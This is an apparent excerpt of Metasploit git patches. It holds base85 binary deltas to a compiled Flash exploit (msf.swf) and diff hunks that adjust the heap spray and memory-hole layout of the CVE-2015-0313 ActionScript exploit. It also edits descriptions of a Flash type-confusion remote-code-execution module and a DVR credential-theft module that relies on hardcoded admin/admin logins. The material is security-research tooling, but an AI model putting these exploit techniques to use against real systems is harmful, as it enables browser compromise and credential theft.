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
Qca-LaQX~{&|MokLqh&xc6#xJL

diff --git a/external/source/exploits/CVE-2015-0313/Exploit.as b/external/source/exploits/CVE-2015-0313/Exploit.as
index 9ff5edcd8f..32dac123b9 100755
--- a/external/source/exploits/CVE-2015-0313/Exploit.as
+++ b/external/source/exploits/CVE-2015-0313/Exploit.as
@@ -23,7 +23,7 @@ import mx.utils.Base64Decoder
 
 public class Exploit extends Sprite
 {
-    private var ov:Vector.<Object> = new Vector.<Object>(80000)
+    private var ov:Vector.<Object> = new Vector.<Object>(120000)
     private var uv:Vector.<uint>
     private var ba:ByteArray = new ByteArray()
     private var worker:Worker
@@ -44,6 +44,16 @@ public class Exploit extends Sprite
     {
         platform = LoaderInfo(this.root.loaderInfo).parameters.pl
         os = LoaderInfo(this.root.loaderInfo).parameters.os
+		Logger.log("od: " + os)
+		var ov_limit:uint
+		if (os == "Windows 8.1" || os == "Windows 8") {
+			ov_limit = 80000
+		} else {
+			ov_limit = 60000
+		}
+		Logger.log("ov: " + ov.length.toString())
+		Logger.log("ov_limit: " + ov_limit.toString())
+		
         var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
         var pattern:RegExp = / /g;
         b64_payload = b64_payload.replace(pattern, "+")
@@ -52,11 +62,13 @@ public class Exploit extends Sprite
 
         ba.length = 0x1000
         ba.shareable = true
+		Logger.log("spray")
         for (var i:uint = 0; i < ov.length; i++) {
             ov[i] = new Vector.<uint>(1014)
             ov[i][0] = 0xdeedbeef
         }
-        for (i = 0; i < ov.length / 2; i += 2) {
+		Logger.log("holes")
+        for (i = 0; i < ov_limit; i += 2) {
 			delete(ov[i])
 		}
         worker = WorkerDomain.current.createWorker(this.loaderInfo.bytes)
@@ -65,6 +77,7 @@ public class Exploit extends Sprite
         worker.setSharedProperty("mc", mc)
         worker.setSharedProperty("ba", ba)
         ApplicationDomain.currentDomain.domainMemory = ba
+		Logger.log('go')
         worker.start()
     }
 
diff --git a/external/source/exploits/CVE-2015-0313/Exploiter.as b/external/source/exploits/CVE-2015-0313/Exploiter.as
index b371c51895..9675548493 100644
--- a/external/source/exploits/CVE-2015-0313/Exploiter.as
+++ b/external/source/exploits/CVE-2015-0313/Exploiter.as
@@ -32,7 +32,7 @@ package
             payload = p
             platform = pl
             op_system = os
-
+			
             ev = new ExploitVector(uv)
             if (!ev.is_ready()) return
             eba = new ExploitByteArray(platform)
diff --git a/external/source/exploits/CVE-2015-0313/Logger.as b/external/source/exploits/CVE-2015-0313/Logger.as
index 16c0447973..61ec768c25 100644
--- a/external/source/exploits/CVE-2015-0313/Logger.as
+++ b/external/source/exploits/CVE-2015-0313/Logger.as
@@ -3,7 +3,7 @@ package
     import flash.external.ExternalInterface
 
     public class Logger {
-        private static const DEBUG:uint = 0
+        private static const DEBUG:uint = 1
  
         public static function alert(msg:String):void
         {

From 0d979f61ae84f637beb46906668d317f35a58e0c Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Wed, 10 Jun 2015 11:09:42 -0500
Subject: [PATCH 0384/1013] Minor fixups on newish modules

---
 modules/auxiliary/gather/avtech744_dvr_accounts.rb          | 6 +++---
 .../multi/browser/adobe_flash_net_connection_confusion.rb   | 2 +-
 2 files changed, 4 insertions(+), 4 deletions(-)

diff --git a/modules/auxiliary/gather/avtech744_dvr_accounts.rb b/modules/auxiliary/gather/avtech744_dvr_accounts.rb
index ea39608764..4c37acb610 100644
--- a/modules/auxiliary/gather/avtech744_dvr_accounts.rb
+++ b/modules/auxiliary/gather/avtech744_dvr_accounts.rb
@@ -9,11 +9,11 @@ class Metasploit3 < Msf::Auxiliary
     super(update_info(info,
       'Name'           => 'AVTECH 744 DVR Account Information Retrieval',
       'Description'    => %q{
-        This module will extract the accounts information from the AVTECH 744 DVR devices,
-        including all the usernames and cleartext passwords plus the device PIN, along with
+        This module will extract the account information from the AVTECH 744 DVR devices,
+        including usernames, cleartext passwords, and the device PIN, along with
         a few other miscellaneous details. In order to extract the information, hardcoded
         credentials admin/admin are used. These credentials can't be changed from the device
-        console UI neither the web UI.
+        console UI nor from the web UI.
       },
       'Author'         => [ 'nstarke' ],
       'License'        => MSF_LICENSE
diff --git a/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb b/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb
index 97dfd64876..1a6ef9ca70 100644
--- a/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb
+++ b/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb
@@ -17,7 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
         This module exploits a type confusion vulnerability in the NetConnection class on
         Adobe Flash Player. When using a correct memory layout this vulnerability allows
         to corrupt arbitrary memory. It can be used to overwrite dangerous objects, like
-        vectors, and finally accomplish remote code execution. This module has been tested
+        vectors, and ultimately accomplish remote code execution. This module has been tested
         successfully on:
         * Windows 7 SP1 (32-bit), IE 8, IE11 and Adobe Flash 16.0.0.305.
         * Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 16.0.0.305.

From ecbddc6ef8dedebca0ce99d88d7e2c570234a4f4 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Wed, 10 Jun 2015 11:54:57 -0500
Subject: [PATCH 0385/1013] Play with memory al little bit better

---
 data/exploits/CVE-2015-0313/msf.swf           | Bin 21149 -> 21011 bytes
 .../source/exploits/CVE-2015-0313/Exploit.as  |  24 +++++++-----------
 .../exploits/CVE-2015-0313/Exploiter.as       |   4 +--
 3 files changed, 11 insertions(+), 17 deletions(-)

diff --git a/data/exploits/CVE-2015-0313/msf.swf b/data/exploits/CVE-2015-0313/msf.swf
index fafeb047efe5791b6bcfecb2d58d7a9613dab1e1..5ffb0426ff2295e78babf3e35a53e672052b2172 100644
GIT binary patch
delta 20893
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
